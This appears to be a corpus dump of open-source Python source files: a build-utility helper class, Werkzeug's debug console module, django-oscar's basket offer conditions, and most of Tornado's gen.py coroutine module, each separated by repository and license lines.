process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
#output, errors = process.communicate()
#sys.stdout.write(output.decode('utf-8'))
#sys.stdout.flush()
output = "";
while True:
nextline = process.stdout.readline().decode('utf-8')
if nextline == '' and process.poll() != None:
break
sys.stdout.write(nextline)
output = output + nextline
sys.stdout.flush()
exitCode = process.returncode
if (exitCode == 0):
return output
raise Exception(cmd, exitCode, output)
@staticmethod
def runAndCapture(cmd):
# from http://stackoverflow.com/a/4418193
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output, errors = process.communicate()
#this is suppose to capture the output but it isn't for some reason so capturing it with the above
exitCode = process.returncode
if (exitCode == 0):
return output.decode('utf-8')
raise Exception(cmd, exitCode, output.decode('utf-8'), errors)
@staticmethod
def shellquote(s):
#from http://stackoverflow.com/a/35857
return "'" + s.replace("'", "'\\''") + "'"
@staticmethod
def num_cores():
return multiprocessing.cpu_count()
@staticmethod
def mkdir(d):
'''mkdir if it doesn't already exist '''
if not os.path.exists(d):
print(CT.boldText("mkdir"), CT.boldGreen(d))
os.makedirs(d)
@staticmethod
def get_file(url, d):
'''get file from url and put it into directory d, return new name '''
fn = url.split('/')[-1]
out_fnp = os.path.join(d, fn)
urllib.request.urlretrieve(url, out_fnp)
return out_fnp
@staticmethod
def get_file_if_size_diff(url, d):
'''only download the file if it's needed, not completely fail proof since it is
just a size check but fairly likely not to be the same for a difference '''
fn = url.split('/')[-1]
out_fnp = os.path.join(d, fn)
net_file_size = int(urllib.request.urlopen(url).info()['Content-Length'])
if os.path.exists(out_fnp):
fn_size = os.path.getsize(out_fnp)
if fn_size == net_file_size:
print("skipping download of", CT.boldGreen(fn))
return out_fnp
else:
print("files sizes differed:", "on disk:", fn_size, "from net:", net_file_size)
print("retrieving", CT.boldGreen(fn), "from", CT.boldBlue(url))
urllib.request.urlretrieve(url, out_fnp)
return out_fnp
@staticmethod
def rm_rf(d):
'''remove directory forcibly'''
if os.path.exists(d):
print(CT.boldText("rm -rf"), CT.boldRed(d))
shutil.rmtree(d)
@staticmethod
def untar(fnp, d):
''' un pack compressed file, guessing format based on extention '''
if fnp.endswith(".tar.gz"):
tar = tarfile.open(fnp, "r:gz")
elif fnp.endswith(".tgz"):
tar = tarfile.open(fnp, "r:gz")
elif fnp.endswith(".tar.bz2"):
tar = tarfile.open(fnp, "r:bz2")
elif fnp.endswith(".tar"):
tar = tarfile.open(fnp, "r")
else:
raise Exception("invalid file? " + fnp)
print("untarring", CT.boldGreen(fnp), "to", CT.boldBlue(d))
tar.extractall(d)
tar.close()
@staticmethod
def getStrFromStrOrList(inputArg):
if isinstance(inputArg, list):
return str(inputArg[0])
elif not isinstance(inputArg, str):
return str(inputArg)
else:
return inputArg
@staticmethod
def clear_dir(d):
''' forcibly delete directory and then re-make it'''
Utils.rm_rf(d)
Utils.mkdir(d)
@staticmethod
def ensureLibDirectoryPresent(localInstallDir):
"""
If a dynamic library's id isn't it's full path name and it isn't in the
dylib search path it won't be linked in properly, so will modify the id
of the libraries to be it's full name
"""
libDir = os.path.join(localInstallDir, "lib")
lib64Dir = os.path.join(localInstallDir, "lib64")
if os.path.exists(lib64Dir) and not os.path.exists(libDir):
os.symlink(lib64Dir, libDir);
@staticmethod
def fixDyLibOnMac(libDir):
"""
If a dynamic library's id isn't it's full path name and it isn't in the
dylib search path it won't be linked in properly, so will modify the id
of the libraries to be it's full name
"""
files = os.listdir(libDir)
for file in files:
fullFile = os.path.join(libDir, file)
if os.path.isfile(fullFile) and str(fullFile).endswith(".dylib"):
try:
cmd = "install_name_tool -id {full_libpath} {full_libpath}".format(full_libpath = os.path.abspath(fullFile))
Utils.run(cmd)
except Exception as e:
print (e)
print(("Failed to fix dylib for {path}".format(path = os.path.abspath(fullFile))))
elif os.path.isdir(fullFile):
Utils.fixDyLibOnMac(fullFile)
| gpl-3.0 |
ljnutal6/media-recommend | app/virtualenvs/recommedia/lib/python2.7/site-packages/werkzeug/debug/console.py | 314 | 5557 | # -*- coding: utf-8 -*-
"""
werkzeug.debug.console
~~~~~~~~~~~~~~~~~~~~~~
Interactive console support.
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD.
"""
import sys
import code
from types import CodeType
from werkzeug.utils import escape
from werkzeug.local import Local
from werkzeug.debug.repr import debug_repr, dump, helper
_local = Local()
class HTMLStringO(object):
"""A StringO version that HTML escapes on write."""
def __init__(self):
self._buffer = []
def isatty(self):
return False
def close(self):
pass
def flush(self):
pass
def seek(self, n, mode=0):
pass
def readline(self):
if len(self._buffer) == 0:
return ''
ret = self._buffer[0]
del self._buffer[0]
return ret
def reset(self):
val = ''.join(self._buffer)
del self._buffer[:]
return val
def _write(self, x):
if isinstance(x, bytes):
x = x.decode('utf-8', 'replace')
self._buffer.append(x)
def write(self, x):
self._write(escape(x))
def writelines(self, x):
self._write(escape(''.join(x)))
class ThreadedStream(object):
"""Thread-local wrapper for sys.stdout for the interactive console."""
def push():
if not isinstance(sys.stdout, ThreadedStream):
sys.stdout = ThreadedStream()
_local.stream = HTMLStringO()
push = staticmethod(push)
def fetch():
try:
stream = _local.stream
except AttributeError:
return ''
return stream.reset()
fetch = staticmethod(fetch)
def displayhook(obj):
try:
stream = _local.stream
except AttributeError:
return _displayhook(obj)
# stream._write bypasses escaping as debug_repr is
# already generating HTML for us.
if obj is not None:
_local._current_ipy.locals['_'] = obj
stream._write(debug_repr(obj))
displayhook = staticmethod(displayhook)
def __setattr__(self, name, value):
raise AttributeError('read only attribute %s' % name)
def __dir__(self):
return dir(sys.__stdout__)
def __getattribute__(self, name):
if name == '__members__':
return dir(sys.__stdout__)
try:
stream = _local.stream
except AttributeError:
stream = sys.__stdout__
return getattr(stream, name)
def __repr__(self):
return repr(sys.__stdout__)
# add the threaded stream as display hook
_displayhook = sys.displayhook
sys.displayhook = ThreadedStream.displayhook
class _ConsoleLoader(object):
def __init__(self):
self._storage = {}
def register(self, code, source):
self._storage[id(code)] = source
# register code objects of wrapped functions too.
for var in code.co_consts:
if isinstance(var, CodeType):
self._storage[id(var)] = source
def get_source_by_code(self, code):
try:
return self._storage[id(code)]
except KeyError:
pass
def _wrap_compiler(console):
compile = console.compile
def func(source, filename, symbol):
code = compile(source, filename, symbol)
console.loader.register(code, source)
return code
console.compile = func
class _InteractiveConsole(code.InteractiveInterpreter):
def __init__(self, globals, locals):
code.InteractiveInterpreter.__init__(self, locals)
self.globals = dict(globals)
self.globals['dump'] = dump
self.globals['help'] = helper
self.globals['__loader__'] = self.loader = _ConsoleLoader()
self.more = False
self.buffer = []
_wrap_compiler(self)
def runsource(self, source):
source = source.rstrip() + '\n'
ThreadedStream.push()
prompt = self.more and '... ' or '>>> '
try:
source_to_eval = ''.join(self.buffer + [source])
if code.InteractiveInterpreter.runsource(self,
source_to_eval, '<debugger>', 'single'):
self.more = True
self.buffer.append(source)
else:
self.more = False
del self.buffer[:]
finally:
output = ThreadedStream.fetch()
return prompt + source + output
def runcode(self, code):
try:
eval(code, self.globals, self.locals)
except Exception:
self.showtraceback()
def showtraceback(self):
from werkzeug.debug.tbtools import get_current_traceback
tb = get_current_traceback(skip=1)
sys.stdout._write(tb.render_summary())
def showsyntaxerror(self, filename=None):
from werkzeug.debug.tbtools import get_current_traceback
tb = get_current_traceback(skip=4)
sys.stdout._write(tb.render_summary())
def write(self, data):
sys.stdout.write(data)
class Console(object):
"""An interactive console."""
def __init__(self, globals=None, locals=None):
if locals is None:
locals = {}
if globals is None:
globals = {}
self._ipy = _InteractiveConsole(globals, locals)
def eval(self, code):
_local._current_ipy = self._ipy
old_sys_stdout = sys.stdout
try:
return self._ipy.runsource(code)
finally:
sys.stdout = old_sys_stdout
| gpl-2.0 |
amirrpp/django-oscar | src/oscar/apps/offer/conditions.py | 23 | 10607 | from decimal import Decimal as D, ROUND_UP
from django.utils import six
from django.utils.translation import ungettext, ugettext_lazy as _
from oscar.apps.offer import utils
from oscar.core.loading import get_model
from oscar.templatetags.currency_filters import currency
Condition = get_model('offer', 'Condition')
__all__ = [
'CountCondition', 'CoverageCondition', 'ValueCondition'
]
class CountCondition(Condition):
"""
An offer condition dependent on the NUMBER of matching items from the
basket.
"""
_description = _("Basket includes %(count)d item(s) from %(range)s")
@property
def name(self):
return self._description % {
'count': self.value,
'range': six.text_type(self.range).lower()}
@property
def description(self):
return self._description % {
'count': self.value,
'range': utils.range_anchor(self.range)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Count condition")
verbose_name_plural = _("Count conditions")
def is_satisfied(self, offer, basket):
"""
Determines whether a given basket meets this condition
"""
num_matches = 0
for line in basket.all_lines():
if (self.can_apply_condition(line)
and line.quantity_without_discount > 0):
num_matches += line.quantity_without_discount
if num_matches >= self.value:
return True
return False
def _get_num_matches(self, basket):
if hasattr(self, '_num_matches'):
return getattr(self, '_num_matches')
num_matches = 0
for line in basket.all_lines():
if (self.can_apply_condition(line)
and line.quantity_without_discount > 0):
num_matches += line.quantity_without_discount
self._num_matches = num_matches
return num_matches
def is_partially_satisfied(self, offer, basket):
num_matches = self._get_num_matches(basket)
return 0 < num_matches < self.value
def get_upsell_message(self, offer, basket):
num_matches = self._get_num_matches(basket)
delta = self.value - num_matches
return ungettext('Buy %(delta)d more product from %(range)s',
'Buy %(delta)d more products from %(range)s', delta) \
% {'delta': delta, 'range': self.range}
def consume_items(self, offer, basket, affected_lines):
"""
Marks items within the basket lines as consumed so they
can't be reused in other offers.
:basket: The basket
:affected_lines: The lines that have been affected by the discount.
This should be list of tuples (line, discount, qty)
"""
# We need to count how many items have already been consumed as part of
# applying the benefit, so we don't consume too many items.
num_consumed = 0
for line, __, quantity in affected_lines:
num_consumed += quantity
to_consume = max(0, self.value - num_consumed)
if to_consume == 0:
return
for __, line in self.get_applicable_lines(offer, basket,
most_expensive_first=True):
quantity_to_consume = min(line.quantity_without_discount,
to_consume)
line.consume(quantity_to_consume)
to_consume -= quantity_to_consume
if to_consume == 0:
break
class CoverageCondition(Condition):
"""
An offer condition dependent on the number of DISTINCT matching items from
the basket.
"""
_description = _("Basket includes %(count)d distinct item(s) from"
" %(range)s")
@property
def name(self):
return self._description % {
'count': self.value,
'range': six.text_type(self.range).lower()}
@property
def description(self):
return self._description % {
'count': self.value,
'range': utils.range_anchor(self.range)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Coverage Condition")
verbose_name_plural = _("Coverage Conditions")
def is_satisfied(self, offer, basket):
"""
Determines whether a given basket meets this condition
"""
covered_ids = []
for line in basket.all_lines():
if not line.is_available_for_discount:
continue
product = line.product
if (self.can_apply_condition(line) and product.id not in
covered_ids):
covered_ids.append(product.id)
if len(covered_ids) >= self.value:
return True
return False
def _get_num_covered_products(self, basket):
covered_ids = []
for line in basket.all_lines():
if not line.is_available_for_discount:
continue
product = line.product
if (self.can_apply_condition(line) and product.id not in
covered_ids):
covered_ids.append(product.id)
return len(covered_ids)
def get_upsell_message(self, offer, basket):
delta = self.value - self._get_num_covered_products(basket)
return ungettext('Buy %(delta)d more product from %(range)s',
'Buy %(delta)d more products from %(range)s', delta) \
% {'delta': delta, 'range': self.range}
def is_partially_satisfied(self, offer, basket):
return 0 < self._get_num_covered_products(basket) < self.value
def consume_items(self, offer, basket, affected_lines):
"""
Marks items within the basket lines as consumed so they
can't be reused in other offers.
"""
# Determine products that have already been consumed by applying the
# benefit
consumed_products = []
for line, __, quantity in affected_lines:
consumed_products.append(line.product)
to_consume = max(0, self.value - len(consumed_products))
if to_consume == 0:
return
for line in basket.all_lines():
product = line.product
if not self.can_apply_condition(line):
continue
if product in consumed_products:
continue
if not line.is_available_for_discount:
continue
# Only consume a quantity of 1 from each line
line.consume(1)
consumed_products.append(product)
to_consume -= 1
if to_consume == 0:
break
def get_value_of_satisfying_items(self, offer, basket):
covered_ids = []
value = D('0.00')
for line in basket.all_lines():
if (self.can_apply_condition(line) and line.product.id not in
covered_ids):
covered_ids.append(line.product.id)
value += utils.unit_price(offer, line)
if len(covered_ids) >= self.value:
return value
return value
class ValueCondition(Condition):
"""
An offer condition dependent on the VALUE of matching items from the
basket.
"""
_description = _("Basket includes %(amount)s from %(range)s")
@property
def name(self):
return self._description % {
'amount': currency(self.value),
'range': six.text_type(self.range).lower()}
@property
def description(self):
return self._description % {
'amount': currency(self.value),
'range': utils.range_anchor(self.range)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Value condition")
verbose_name_plural = _("Value conditions")
def is_satisfied(self, offer, basket):
"""
Determine whether a given basket meets this condition
"""
value_of_matches = D('0.00')
for line in basket.all_lines():
if (self.can_apply_condition(line) and
line.quantity_without_discount > 0):
price = utils.unit_price(offer, line)
value_of_matches += price * int(line.quantity_without_discount)
if value_of_matches >= self.value:
return True
return False
def _get_value_of_matches(self, offer, basket):
if hasattr(self, '_value_of_matches'):
return getattr(self, '_value_of_matches')
value_of_matches = D('0.00')
for line in basket.all_lines():
if (self.can_apply_condition(line) and
line.quantity_without_discount > 0):
price = utils.unit_price(offer, line)
value_of_matches += price * int(line.quantity_without_discount)
self._value_of_matches = value_of_matches
return value_of_matches
def is_partially_satisfied(self, offer, basket):
value_of_matches = self._get_value_of_matches(offer, basket)
return D('0.00') < value_of_matches < self.value
def get_upsell_message(self, offer, basket):
value_of_matches = self._get_value_of_matches(offer, basket)
return _('Spend %(value)s more from %(range)s') % {
'value': currency(self.value - value_of_matches),
'range': self.range}
def consume_items(self, offer, basket, affected_lines):
"""
Marks items within the basket lines as consumed so they
can't be reused in other offers.
We allow lines to be passed in as sometimes we want them sorted
in a specific order.
"""
# Determine value of items already consumed as part of discount
value_consumed = D('0.00')
for line, __, qty in affected_lines:
price = utils.unit_price(offer, line)
value_consumed += price * qty
to_consume = max(0, self.value - value_consumed)
if to_consume == 0:
return
for price, line in self.get_applicable_lines(
offer, basket, most_expensive_first=True):
quantity_to_consume = min(
line.quantity_without_discount,
(to_consume / price).quantize(D(1), ROUND_UP))
line.consume(quantity_to_consume)
to_consume -= price * quantity_to_consume
if to_consume <= 0:
break
| bsd-3-clause |
Acidburn0zzz/tornado | tornado/gen.py | 30 | 39041 | """``tornado.gen`` is a generator-based interface to make it easier to
work in an asynchronous environment. Code using the ``gen`` module
is technically asynchronous, but it is written as a single generator
instead of a collection of separate functions.
For example, the following asynchronous handler:
.. testcode::
class AsyncHandler(RequestHandler):
@asynchronous
def get(self):
http_client = AsyncHTTPClient()
http_client.fetch("http://example.com",
callback=self.on_fetch)
def on_fetch(self, response):
do_something_with_response(response)
self.render("template.html")
.. testoutput::
:hide:
could be written with ``gen`` as:
.. testcode::
class GenAsyncHandler(RequestHandler):
@gen.coroutine
def get(self):
http_client = AsyncHTTPClient()
response = yield http_client.fetch("http://example.com")
do_something_with_response(response)
self.render("template.html")
.. testoutput::
:hide:
Most asynchronous functions in Tornado return a `.Future`;
yielding this object returns its `~.Future.result`.
You can also yield a list or dict of ``Futures``, which will be
started at the same time and run in parallel; a list or dict of results will
be returned when they are all finished:
.. testcode::
@gen.coroutine
def get(self):
http_client = AsyncHTTPClient()
response1, response2 = yield [http_client.fetch(url1),
http_client.fetch(url2)]
response_dict = yield dict(response3=http_client.fetch(url3),
response4=http_client.fetch(url4))
response3 = response_dict['response3']
response4 = response_dict['response4']
.. testoutput::
:hide:
If the `~functools.singledispatch` library is available (standard in
Python 3.4, available via the `singledispatch
<https://pypi.python.org/pypi/singledispatch>`_ package on older
versions), additional types of objects may be yielded. Tornado includes
support for ``asyncio.Future`` and Twisted's ``Deferred`` class when
``tornado.platform.asyncio`` and ``tornado.platform.twisted`` are imported.
See the `convert_yielded` function to extend this mechanism.
.. versionchanged:: 3.2
Dict support added.
.. versionchanged:: 4.1
Support added for yielding ``asyncio`` Futures and Twisted Deferreds
via ``singledispatch``.
"""
from __future__ import absolute_import, division, print_function, with_statement
import collections
import functools
import itertools
import sys
import textwrap
import types
from tornado.concurrent import Future, TracebackFuture, is_future, chain_future
from tornado.ioloop import IOLoop
from tornado.log import app_log
from tornado import stack_context
from tornado.util import raise_exc_info
try:
from functools import singledispatch # py34+
except ImportError as e:
try:
from singledispatch import singledispatch # backport
except ImportError:
singledispatch = None
try:
from collections.abc import Generator as GeneratorType # py35+
except ImportError:
from types import GeneratorType
try:
from inspect import isawaitable # py35+
except ImportError:
def isawaitable(x): return False
try:
import builtins # py3
except ImportError:
import __builtin__ as builtins
class KeyReuseError(Exception):
pass
class UnknownKeyError(Exception):
pass
class LeakedCallbackError(Exception):
pass
class BadYieldError(Exception):
pass
class ReturnValueIgnoredError(Exception):
pass
class TimeoutError(Exception):
"""Exception raised by ``with_timeout``."""
def engine(func):
"""Callback-oriented decorator for asynchronous generators.
This is an older interface; for new code that does not need to be
compatible with versions of Tornado older than 3.0 the
`coroutine` decorator is recommended instead.
This decorator is similar to `coroutine`, except it does not
return a `.Future` and the ``callback`` argument is not treated
specially.
In most cases, functions decorated with `engine` should take
a ``callback`` argument and invoke it with their result when
they are finished. One notable exception is the
`~tornado.web.RequestHandler` :ref:`HTTP verb methods <verbs>`,
which use ``self.finish()`` in place of a callback argument.
"""
func = _make_coroutine_wrapper(func, replace_callback=False)
@functools.wraps(func)
def wrapper(*args, **kwargs):
future = func(*args, **kwargs)
def final_callback(future):
if future.result() is not None:
raise ReturnValueIgnoredError(
"@gen.engine functions cannot return values: %r" %
(future.result(),))
# The engine interface doesn't give us any way to return
# errors but to raise them into the stack context.
# Save the stack context here to use when the Future has resolved.
future.add_done_callback(stack_context.wrap(final_callback))
return wrapper
def coroutine(func, replace_callback=True):
"""Decorator for asynchronous generators.
Any generator that yields objects from this module must be wrapped
in either this decorator or `engine`.
Coroutines may "return" by raising the special exception
`Return(value) <Return>`. In Python 3.3+, it is also possible for
the function to simply use the ``return value`` statement (prior to
Python 3.3 generators were not allowed to also return values).
In all versions of Python a coroutine that simply wishes to exit
early may use the ``return`` statement without a value.
Functions with this decorator return a `.Future`. Additionally,
they may be called with a ``callback`` keyword argument, which
will be invoked with the future's result when it resolves. If the
coroutine fails, the callback will not be run and an exception
will be raised into the surrounding `.StackContext`. The
``callback`` argument is not visible inside the decorated
function; it is handled by the decorator itself.
From the caller's perspective, ``@gen.coroutine`` is similar to
the combination of ``@return_future`` and ``@gen.engine``.
.. warning::
When exceptions occur inside a coroutine, the exception
information will be stored in the `.Future` object. You must
examine the result of the `.Future` object, or the exception
may go unnoticed by your code. This means yielding the function
if called from another coroutine, using something like
`.IOLoop.run_sync` for top-level calls, or passing the `.Future`
to `.IOLoop.add_future`.
"""
return _make_coroutine_wrapper(func, replace_callback=True)
def _make_coroutine_wrapper(func, replace_callback):
"""The inner workings of ``@gen.coroutine`` and ``@gen.engine``.
The two decorators differ in their treatment of the ``callback``
argument, so we cannot simply implement ``@engine`` in terms of
``@coroutine``.
"""
# On Python 3.5, set the coroutine flag on our generator, to allow it
# to be used with 'await'.
if hasattr(types, 'coroutine'):
func = types.coroutine(func)
@functools.wraps(func)
def wrapper(*args, **kwargs):
future = TracebackFuture()
if replace_callback and 'callback' in kwargs:
callback = kwargs.pop('callback')
IOLoop.current().add_future(
future, lambda future: callback(future.result()))
try:
result = func(*args, **kwargs)
except (Return, StopIteration) as e:
result = getattr(e, 'value', None)
except Exception:
future.set_exc_info(sys.exc_info())
return future
else:
if isinstance(result, GeneratorType):
# Inline the first iteration of Runner.run. This lets us
# avoid the cost of creating a Runner when the coroutine
# never actually yields, which in turn allows us to
# use "optional" coroutines in critical path code without
# performance penalty for the synchronous case.
try:
orig_stack_contexts = stack_context._state.contexts
yielded = next(result)
if stack_context._state.contexts is not orig_stack_contexts:
yielded = TracebackFuture()
yielded.set_exception(
stack_context.StackContextInconsistentError(
'stack_context inconsistency (probably caused '
'by yield within a "with StackContext" block)'))
except (StopIteration, Return) as e:
future.set_result(getattr(e, 'value', None))
except Exception:
future.set_exc_info(sys.exc_info())
else:
Runner(result, future, yielded)
try:
return future
finally:
# Subtle memory optimization: if next() raised an exception,
# the future's exc_info contains a traceback which
# includes this stack frame. This creates a cycle,
# which will be collected at the next full GC but has
# been shown to greatly increase memory usage of
# benchmarks (relative to the refcount-based scheme
# used in the absence of cycles). We can avoid the
# cycle by clearing the local variable after we return it.
future = None
future.set_result(result)
return future
return wrapper
class Return(Exception):
"""Special exception to return a value from a `coroutine`.
If this exception is raised, its value argument is used as the
result of the coroutine::
@gen.coroutine
def fetch_json(url):
response = yield AsyncHTTPClient().fetch(url)
raise gen.Return(json_decode(response.body))
In Python 3.3, this exception is no longer necessary: the ``return``
statement can be used directly to return a value (previously
``yield`` and ``return`` with a value could not be combined in the
same function).
By analogy with the return statement, the value argument is optional,
but it is never necessary to ``raise gen.Return()``. The ``return``
statement can be used with no arguments instead.
"""
def __init__(self, value=None):
super(Return, self).__init__()
self.value = value
class WaitIterator(object):
"""Provides an iterator to yield the results of futures as they finish.
Yielding a set of futures like this:
``results = yield [future1, future2]``
pauses the coroutine until both ``future1`` and ``future2``
return, and then restarts the coroutine with the results of both
futures. If either future is an exception, the expression will
raise that exception and all the results will be lost.
If you need to get the result of each future as soon as possible,
or if you need the result of some futures even if others produce
errors, you can use ``WaitIterator``::
wait_iterator = gen.WaitIterator(future1, future2)
while not wait_iterator.done():
try:
result = yield wait_iterator.next()
except Exception as e:
print("Error {} from {}".format(e, wait_iterator.current_future))
else:
print("Result {} received from {} at {}".format(
result, wait_iterator.current_future,
wait_iterator.current_index))
Because results are returned as soon as they are available the
output from the iterator *will not be in the same order as the
input arguments*. If you need to know which future produced the
current result, you can use the attributes
``WaitIterator.current_future``, or ``WaitIterator.current_index``
to get the index of the future from the input list. (if keyword
arguments were used in the construction of the `WaitIterator`,
``current_index`` will use the corresponding keyword).
On Python 3.5, `WaitIterator` implements the async iterator
protocol, so it can be used with the ``async for`` statement (note
that in this version the entire iteration is aborted if any value
raises an exception, while the previous example can continue past
individual errors)::
async for result in gen.WaitIterator(future1, future2):
print("Result {} received from {} at {}".format(
result, wait_iterator.current_future,
wait_iterator.current_index))
.. versionadded:: 4.1
.. versionchanged:: 4.3
Added ``async for`` support in Python 3.5.
"""
def __init__(self, *args, **kwargs):
if args and kwargs:
raise ValueError(
"You must provide args or kwargs, not both")
if kwargs:
self._unfinished = dict((f, k) for (k, f) in kwargs.items())
futures = list(kwargs.values())
else:
self._unfinished = dict((f, i) for (i, f) in enumerate(args))
futures = args
self._finished = collections.deque()
self.current_index = self.current_future = None
self._running_future = None
for future in futures:
future.add_done_callback(self._done_callback)
def done(self):
"""Returns True if this iterator has no more results."""
if self._finished or self._unfinished:
return False
# Clear the 'current' values when iteration is done.
self.current_index = self.current_future = None
return True
def next(self):
"""Returns a `.Future` that will yield the next available result.
Note that this `.Future` will not be the same object as any of
the inputs.
"""
self._running_future = TracebackFuture()
if self._finished:
self._return_result(self._finished.popleft())
return self._running_future
def _done_callback(self, done):
if self._running_future and not self._running_future.done():
self._return_result(done)
else:
self._finished.append(done)
def _return_result(self, done):
"""Called set the returned future's state that of the future
we yielded, and set the current future for the iterator.
"""
chain_future(done, self._running_future)
self.current_future = done
self.current_index = self._unfinished.pop(done)
@coroutine
def __aiter__(self):
raise Return(self)
def __anext__(self):
if self.done():
# Lookup by name to silence pyflakes on older versions.
raise getattr(builtins, 'StopAsyncIteration')()
return self.next()
class YieldPoint(object):
"""Base class for objects that may be yielded from the generator.
.. deprecated:: 4.0
Use `Futures <.Future>` instead.
"""
def start(self, runner):
"""Called by the runner after the generator has yielded.
No other methods will be called on this object before ``start``.
"""
raise NotImplementedError()
def is_ready(self):
"""Called by the runner to determine whether to resume the generator.
Returns a boolean; may be called more than once.
"""
raise NotImplementedError()
def get_result(self):
"""Returns the value to use as the result of the yield expression.
This method will only be called once, and only after `is_ready`
has returned true.
"""
raise NotImplementedError()
class Callback(YieldPoint):
"""Returns a callable object that will allow a matching `Wait` to proceed.
The key may be any value suitable for use as a dictionary key, and is
used to match ``Callbacks`` to their corresponding ``Waits``. The key
must be unique among outstanding callbacks within a single run of the
generator function, but may be reused across different runs of the same
function (so constants generally work fine).
The callback may be called with zero or one arguments; if an argument
is given it will be returned by `Wait`.
.. deprecated:: 4.0
Use `Futures <.Future>` instead.
"""
def __init__(self, key):
self.key = key
def start(self, runner):
self.runner = runner
runner.register_callback(self.key)
def is_ready(self):
return True
def get_result(self):
return self.runner.result_callback(self.key)
class Wait(YieldPoint):
"""Returns the argument passed to the result of a previous `Callback`.
.. deprecated:: 4.0
Use `Futures <.Future>` instead.
"""
def __init__(self, key):
self.key = key
def start(self, runner):
self.runner = runner
def is_ready(self):
return self.runner.is_ready(self.key)
def get_result(self):
return self.runner.pop_result(self.key)
class WaitAll(YieldPoint):
"""Returns the results of multiple previous `Callbacks <Callback>`.
The argument is a sequence of `Callback` keys, and the result is
a list of results in the same order.
`WaitAll` is equivalent to yielding a list of `Wait` objects.
.. deprecated:: 4.0
Use `Futures <.Future>` instead.
"""
def __init__(self, keys):
self.keys = keys
def start(self, runner):
self.runner = runner
def is_ready(self):
return all(self.runner.is_ready(key) for key in self.keys)
def get_result(self):
return [self.runner.pop_result(key) for key in self.keys]
def Task(func, *args, **kwargs):
"""Adapts a callback-based asynchronous function for use in coroutines.
Takes a function (and optional additional arguments) and runs it with
those arguments plus a ``callback`` keyword argument. The argument passed
to the callback is returned as the result of the yield expression.
.. versionchanged:: 4.0
``gen.Task`` is now a function that returns a `.Future`, instead of
a subclass of `YieldPoint`. It still behaves the same way when
yielded.
"""
future = Future()
def handle_exception(typ, value, tb):
if future.done():
return False
future.set_exc_info((typ, value, tb))
return True
def set_result(result):
if future.done():
return
future.set_result(result)
with stack_context.ExceptionStackContext(handle_exception):
func(*args, callback=_argument_adapter(set_result), **kwargs)
return future
class YieldFuture(YieldPoint):
def __init__(self, future, io_loop=None):
"""Adapts a `.Future` to the `YieldPoint` interface.
.. versionchanged:: 4.1
The ``io_loop`` argument is deprecated.
"""
self.future = future
self.io_loop = io_loop or IOLoop.current()
def start(self, runner):
if not self.future.done():
self.runner = runner
self.key = object()
runner.register_callback(self.key)
self.io_loop.add_future(self.future, runner.result_callback(self.key))
else:
self.runner = None
self.result_fn = self.future.result
def is_ready(self):
if self.runner is not None:
return self.runner.is_ready(self.key)
else:
return True
def get_result(self):
if self.runner is not None:
return self.runner.pop_result(self.key).result()
else:
return self.result_fn()
class Multi(YieldPoint):
"""Runs multiple asynchronous operations in parallel.
Takes a list of ``YieldPoints`` or ``Futures`` and returns a list of
their responses. It is not necessary to call `Multi` explicitly,
since the engine will do so automatically when the generator yields
a list of ``YieldPoints`` or a mixture of ``YieldPoints`` and ``Futures``.
Instead of a list, the argument may also be a dictionary whose values are
Futures, in which case a parallel dictionary is returned mapping the same
keys to their results.
It is not normally necessary to call this class directly, as it
will be created automatically as needed. However, calling it directly
allows you to use the ``quiet_exceptions`` argument to control
the logging of multiple exceptions.
.. versionchanged:: 4.2
If multiple ``YieldPoints`` fail, any exceptions after the first
(which is raised) will be logged. Added the ``quiet_exceptions``
argument to suppress this logging for selected exception types.
"""
def __init__(self, children, quiet_exceptions=()):
self.keys = None
if isinstance(children, dict):
self.keys = list(children.keys())
children = children.values()
self.children = []
for i in children:
if is_future(i):
i = YieldFuture(i)
self.children.append(i)
assert all(isinstance(i, YieldPoint) for i in self.children)
self.unfinished_children = set(self.children)
self.quiet_exceptions = quiet_exceptions
def start(self, runner):
for i in self.children:
i.start(runner)
def is_ready(self):
finished = list(itertools.takewhile(
lambda i: i.is_ready(), self.unfinished_children))
self.unfinished_children.difference_update(finished)
return not self.unfinished_children
def get_result(self):
result_list = []
exc_info = None
for f in self.children:
try:
result_list.append(f.get_result())
except Exception as e:
if exc_info is None:
exc_info = sys.exc_info()
else:
if not isinstance(e, self.quiet_exceptions):
app_log.error("Multiple exceptions in yield list",
exc_info=True)
if exc_info is not None:
raise_exc_info(exc_info)
if self.keys is not None:
return dict(zip(self.keys, result_list))
else:
return list(result_list)
def multi_future(children, quiet_exceptions=()):
"""Wait for multiple asynchronous futures in parallel.
Takes a list of ``Futures`` or other yieldable objects (with the
exception of the legacy `.YieldPoint` interfaces) and returns a
new Future that resolves when all the other Futures are done. If
all the ``Futures`` succeeded, the returned Future's result is a
list of their results. If any failed, the returned Future raises
the exception of the first one to fail.
Instead of a list, the argument may also be a dictionary whose values are
Futures, in which case a parallel dictionary is returned mapping the same
keys to their results.
It is not normally necessary to call `multi_future` explcitly,
since the engine will do so automatically when the generator
yields a list of ``Futures``. However, calling it directly
allows you to use the ``quiet_exceptions`` argument to control
the logging of multiple exceptions.
This function is faster than the `Multi` `YieldPoint` because it
does not require the creation of a stack context.
.. versionadded:: 4.0
.. versionchanged:: 4.2
If multiple ``Futures`` fail, any exceptions after the first (which is
raised) will be logged. Added the ``quiet_exceptions``
argument to suppress this logging for selected exception types.
.. versionchanged:: 4.3
Added support for other yieldable objects.
"""
if isinstance(children, dict):
keys = list(children.keys())
children = children.values()
else:
keys = None
children = list(map(convert_yielded, children))
assert all(is_future(i) for i in children)
unfinished_children = set(children)
future = Future()
if not children:
future.set_result({} if keys is not None else [])
def callback(f):
unfinished_children.remove(f)
if not unfinished_children:
result_list = []
for f in children:
try:
result_list.append(f.result())
except Exception as e:
if future.done():
if not isinstance(e, quiet_exceptions):
app_log.error("Multiple exceptions in yield list",
exc_info=True)
else:
future.set_exc_info(sys.exc_info())
if not future.done():
if keys is not None:
future.set_result(dict(zip(keys, result_list)))
else:
future.set_result(result_list)
listening = set()
for f in children:
if f not in listening:
listening.add(f)
f.add_done_callback(callback)
return future
def maybe_future(x):
"""Converts ``x`` into a `.Future`.
